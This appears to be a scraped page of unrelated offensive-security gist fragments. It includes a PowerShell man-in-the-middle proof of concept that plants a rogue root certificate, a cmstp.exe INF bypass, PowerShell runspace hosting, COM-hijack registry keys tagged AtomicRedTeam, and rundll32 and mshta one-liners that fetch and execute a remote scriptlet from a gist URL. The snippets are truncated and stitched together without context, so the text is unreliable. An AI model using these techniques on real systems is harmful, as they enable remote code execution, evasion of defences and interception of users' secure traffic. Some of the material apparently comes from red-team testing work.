This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<#
.SYNOPSIS
This script demonstrates the ability to capture and tamper with Web sessions.
For secure sessions, this is done by dynamically writing certificates to match the requested domain.
This is only proof-of-concept, and should be used cautiously, to demonstrate the effects of such an attack.
Function: Interceptor
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause

#Verify Not Present
( Get-ChildItem Cert:\CurrentUser\Root | Where-Object {$_.Subject -match "__Interceptor_Trusted_Root" })
#Import-Certificate
( Get-ChildItem -Path C:\Test\thing.cer ) | Import-Certificate -CertStoreLocation cert:\CurrentUser\Root
#Prompted
Remove-Item -Path cert:\CurrentUser\Root\5C205339AE9FA846FA99D3FFF0CDEE65EB8D8E99

#!/bin/sh
#
# `7MN. `7MF'
# __, MMN. M
#`7MM M YMb M pd""b.
# MM M `MN. M (O) `8b
# MM M `MM.M ,89
# MM M YMM ""Yb.
#.JMML..JML. YM 88
# (O) .M'

function Get-PublicKey
{
[OutputType([byte[]])]
PARAM (
[Uri]$Uri
)
if (-Not ($uri.Scheme -eq "https"))
{
Write-Error "You can only get keys for https addresses"

;cmstp.exe /s cmstp.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]

#r @"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll"
open System.Management.Automation
open System.Management.Automation.Runspaces
open System
let runSpace = RunspaceFactory.CreateRunspace()
runSpace.Open()
let pipeline = runSpace.CreatePipeline()

# -*- coding: UTF-8 -*-
import enum, os, sys
# https://twitter.com/highsenburger69
from ctypes.wintypes import *
from ctypes import *
# These libraries have the APIs we need
kernel32 = WinDLL('kernel32', use_last_error=True)
advapi32 = WinDLL('advapi32', use_last_error=True)
shell32 = WinDLL('shell32', use_last_error=True)
psapi = WinDLL('psapi.dll', use_last_error=True)

xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}
verclsid.exe /S /C {00000001-0000-0000-0000-0000FEEDACDC}
create new folder and rename file.{00000001-0000-0000-0000-0000FEEDACDC}
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");close();
mshta javascript:o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");o.Exec();close();

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]

using System;
using System.Runtime.InteropServices;
enum RETRIEVAL_METHOD {
ODUID_DEFAULT = 0,
ODUID_TPM_EK,
ODUID_UEFI_VARIABLE_TPM,
ODUID_UEFI_VARIABLE_RANDOMSEED,
ODUID_UEFI_DEV_LOCK_UNLOCK,
ODUID_XBOX_CONSOLE_ID // this should never be seen, with xbox one a different function is called to get the console ID